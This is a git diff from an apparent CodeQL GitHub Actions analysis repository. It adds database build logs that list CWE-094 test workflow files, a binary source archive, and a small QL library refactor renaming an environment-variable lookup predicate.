KiB) for 'yaml_locations'. +[2024-03-01 13:05:59] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-03-01 13:05:59] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-03-01 13:05:59] Saving string and id pools to disk. +[2024-03-01 13:05:59] Finished importing TRAP files. +[2024-03-01 13:05:59] Read 360.45 KiB of uncompressed TRAP data. +[2024-03-01 13:05:59] Relation data size: 88.97 KiB (merge rate: 1.39 MiB/s) +[2024-03-01 13:05:59] String pool size: 2.06 MiB +[2024-03-01 13:05:59] ID pool size: 1.08 MiB +[2024-03-01 13:05:59] [PROGRESS] dataset import> Finished writing database (relations: 88.97 KiB; string pool: 2.06 MiB). +[2024-03-01 13:05:59] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-03-01 13:05:59] The disk cache is freshly trimmed; leave it be. +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Plumbing command codeql dataset import completed. +[2024-03-01 13:05:59] [PROGRESS] database finalize> TRAP import complete (560ms). +[2024-03-01 13:05:59] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-03-01 13:05:59] [PROGRESS] database cleanup> TRAP files cleaned up (13ms). +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). +[2024-03-01 13:05:59] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml +[2024-03-01 13:05:59] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml. +[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode trim. +[2024-03-01 13:05:59] Sequence stamp origin is -6212520900610201313 +[2024-03-01 13:05:59] Pausing evaluation to quickly trim memory at sequence stamp o+0 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+1 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:06:00] Trimming completed (3ms): Trimmed disposable data from cache. +[2024-03-01 13:06:00] Pausing evaluation to close the cache at sequence stamp o+2 +[2024-03-01 13:06:00] The disk cache is freshly trimmed; leave it be. +[2024-03-01 13:06:00] Unpausing evaluation +[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml +[2024-03-01 13:06:00] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml (3ms). +[2024-03-01 13:06:00] Plumbing command codeql dataset cleanup completed. +[2024-03-01 13:06:00] Plumbing command codeql database cleanup completed with status 0. +[2024-03-01 13:06:00] [PROGRESS] database finalize> Finished zipping source archive (20.00 KiB). +[2024-03-01 13:06:00] Plumbing command codeql database finalize completed. +[2024-03-01 13:06:00] [PROGRESS] database create> Successfully created database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:06:00] Terminating normally. diff --git a/db/log/database-index-files-20240301.130558.974.log b/db/log/database-index-files-20240301.130558.974.log new file mode 100644 index 000000000000..e204c6df37d0 --- /dev/null +++ b/db/log/database-index-files-20240301.130558.974.log @@ -0,0 +1,44 @@ +[2024-03-01 13:05:58] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Log file was started late. +[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. +[2024-03-01 13:05:59] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --format=json +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1... +[2024-03-01 13:05:59] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml" + ] +[2024-03-01 13:05:59] [DETAILS] database index-files> Found 26 files. +[2024-03-01 13:05:59] [PROGRESS] database index-files> /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. +[2024-03-01 13:05:59] [PROGRESS] database index-files> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] +[2024-03-01 13:05:59] Terminating normally. diff --git a/db/src.zip b/db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..3006b787babfbfd5da405e1a7f5736ea762e4abe GIT binary patch literal 20479 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 literal 0 HcmV?d00001 diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cb561fdf8d1c..096f3b9f8033 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,4 +1,4 @@ -private import codeql.actions.ast.internal.Actions +private import codeql.actions.ast.internal.Yaml private import codeql.Locations /** @@ -23,78 +23,142 @@ class AstNode instanceof YamlNode { /** * Gets a environment variable expression by name in the scope of the current node. */ - Expression getEnvExpr(string name) { - exists(Actions::Env env | - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - | - env.(Actions::StepEnv).getStep().getAChildNode*() = this + StringLiteral getEnvVar(string name) { + exists(Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | + env.(StepEnv).getStep().getAChildNode*() = this or - env.(Actions::JobEnv).getJob().getAChildNode*() = this + env.(JobEnv).getJob().getAChildNode*() = this or - env.(Actions::WorkflowEnv).getWorkflow().getAChildNode*() = this + env.(WorkflowEnv).getWorkflow().getAChildNode*() = this ) } } +/** A common class for `env` in workflow, 